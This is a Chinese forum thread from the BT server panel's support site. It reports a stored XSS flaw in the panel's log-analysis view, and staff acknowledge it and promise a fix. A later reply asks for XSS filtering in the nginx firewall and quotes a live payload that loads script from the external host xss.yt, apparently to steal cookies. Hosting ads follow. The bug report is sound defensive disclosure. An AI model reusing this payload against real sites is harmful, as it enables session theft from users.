【已完成】非常紧急的Bug，明知道是XSS却还加载

网站日志中存在“日志安全分析”板块
当我分析完成后，点击XSS希望查看相关日志的时候
宝塔面板将XSS语句当作了html标签加载了
一瞬间弹出了不少alert
目前尚且不知我宝塔面板的cookie和地址等有无外泄
请立即修复并尽可能强制更新
版本是7.9.0
Edge浏览器
系统:Ubuntu 20.04.4 LTS x86_64(Py3.7.9)

谢花郎 · 发表于 2022-5-19 19:17:54

感谢反馈，我们这边确认下这个问题。

谢花郎 · 发表于 2022-5-19 19:25:57

已奖励300宝塔币，明天修复。

宝塔用户_fcgtve · 发表于 2023-4-12 16:46:52

谢花郎发表于 2022-5-19 19:25
已奖励300宝塔币，明天修复。

目前nginx防火墙中，post过滤没有xss过滤规则，希望添加上，尽快更新，刚被xss了，上攻击的内容<a href=/xsssafe/>Holle<sCRiPt sRC=//xss.yt/I9Kc></sCrIpT>

█ 菠萝云-免费装宝塔,4G内存68 █	█ 易探云·香港/美国vps仅9元 █	▅▆▇ 慈云数据-服务器9.9/月 ▇▆▅	4C4G500M带宽高防69元	【多途云】高防CDN
高防服务器，无视一切流量攻击	A7招租，联系qq394030111	OV/EV SSL证书，可当日签发	【阿里云】宝塔一键部署，5.5折	宝塔一键部署DV,EV,OV,SSL证书
█ 易探云·高防云4核8G仅88元 █	高防CDN全球节点99元	█香港站群新年大促█ 免费试用 █	【阿里云】2核2G，3M，45.1元/年	在线网站测速、批量PING运维工具